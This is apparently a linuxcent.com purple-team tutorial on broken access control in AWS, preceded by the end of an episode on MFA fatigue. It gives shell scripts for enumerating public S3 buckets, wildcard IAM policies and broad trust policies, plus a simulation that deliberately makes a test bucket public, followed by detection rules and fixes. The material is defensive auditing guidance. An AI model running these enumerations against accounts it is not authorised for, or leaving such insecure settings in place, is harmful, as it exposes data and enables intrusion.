Social engineering layer	Attacker contacts user claiming to be IT support	Hardware key (physical presence required)
Session token theft	Steal valid session without needing MFA at all	Short session lifetime + re-auth for sensitive ops
Number matching bypass	Relay number via voice call in real time	Hardware key (no relay possible)
SIM swap	Port victim’s phone number to attacker’s SIM; receive OTP	Hardware key (phone-independent)

Key Takeaways

An MFA fatigue attack exploits push notification UX — training users to tap “deny” competes with a trained habit of tapping “accept”; hardware keys eliminate the attack surface by requiring physical presence
The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)
Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP’s logs; adding the detection rule is the work
Number matching is a meaningful intermediate mitigation; it is not a structural fix
Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design
Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one
Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated

What’s Next

EP06 covers CI/CD secrets exposure — how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07): short-lived credentials that cannot be exfiltrated because they don’t exist until the moment they’re needed.

Get EP06 in your inbox when it publishes → subscribe at linuxcent.com

Broken Access Control in AWS: From Misconfigured S3 to Admin

June 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS

TL;DR

Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
A public S3 bucket containing 47 million customer records went undetected for six months in an authorized assessment — no GuardDuty finding, no AWS Config alert, because those controls weren’t enabled
The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.

The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when public access is enabled, but only if the finding is new during GuardDuty’s monitoring window. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.

Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    # Check account-level block
    account_block=$(aws s3control get-public-access-block \
      --account-id $(aws sts get-caller-identity --query Account --output text) \
      2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')

    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    if echo "$doc" | jq -e '.Statement[] | select(.Effect == "Allow" and .Action == "*")' > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq '.Statement[] | select(.Effect == "Allow" and .Action == "*")'
    fi
  done

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read role_arn; do
    trust=$(aws iam get-role --role-name "$(basename $role_arn)" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals
    if echo "$trust" | jq -e '.Statement[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust without conditions
    if echo "$trust" | jq -e '.Statement[] | select(.Principal.AWS | type == "string" and test("arn:aws:iam::[0-9]+:root"))' > /dev/null 2>&1; then
      account_in_trust=$(echo "$trust" | jq -r '.Statement[] | .Principal.AWS // empty' | grep -oP '(?<=arn:aws:iam::)[0-9]+')
      current_account=$(aws sts get-caller-identity --query Account --output text)
      if [ "$account_in_trust" != "$current_account" ]; then
        echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
      fi
    fi
  done

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type	Trigger	Severity
`Policy:S3/BucketAnonymousAccessGranted`	Bucket policy or ACL grants public read/write	Medium
`Policy:S3/BucketPublicAccessGranted`	Same as above — alternate finding type	Medium
`Discovery:S3/MaliciousIPCaller`	S3 GetObject from a known malicious IP	High

# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

# CloudTrail Insights query (Athena) to find anonymous S3 GetObject events
# Assumes CloudTrail S3 data events are enabled for the bucket

SELECT
  eventTime,
  sourceIPAddress,
  requestParameters.bucketName,
  requestParameters.key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND eventTime > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutBucketPublicAccessBlock",
        "s3:DeletePublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}

# Apply the SCP to your organizational unit
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trailProperties": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or have read-only access to audit:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
    if echo "$trust" | jq -e '.[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
if [ -z "$ANALYZER" ]; then
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.

Quick Reference

Control	What It Does	AWS Service
Account-level S3 public access block	Prevents any bucket from becoming public	S3 Control
SCP: deny public access block disable	Prevents disabling the account-level block	Organizations
AWS Config: `S3_BUCKET_PUBLIC_READ_PROHIBITED`	Flags buckets that are or become public	AWS Config
GuardDuty: `Policy:S3/BucketAnonymousAccessGranted`	Detects new public access grants	GuardDuty
IAM Access Analyzer	Finds all resources with external access grants	Access Analyzer
CloudTrail S3 data events	Captures GetObject/PutObject for audit	CloudTrail
IAM policy generation	Generates least-privilege policy from actual usage	Access Analyzer

Key Takeaways

Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.

Get EP05 in your inbox when it publishes → subscribe at linuxcent.com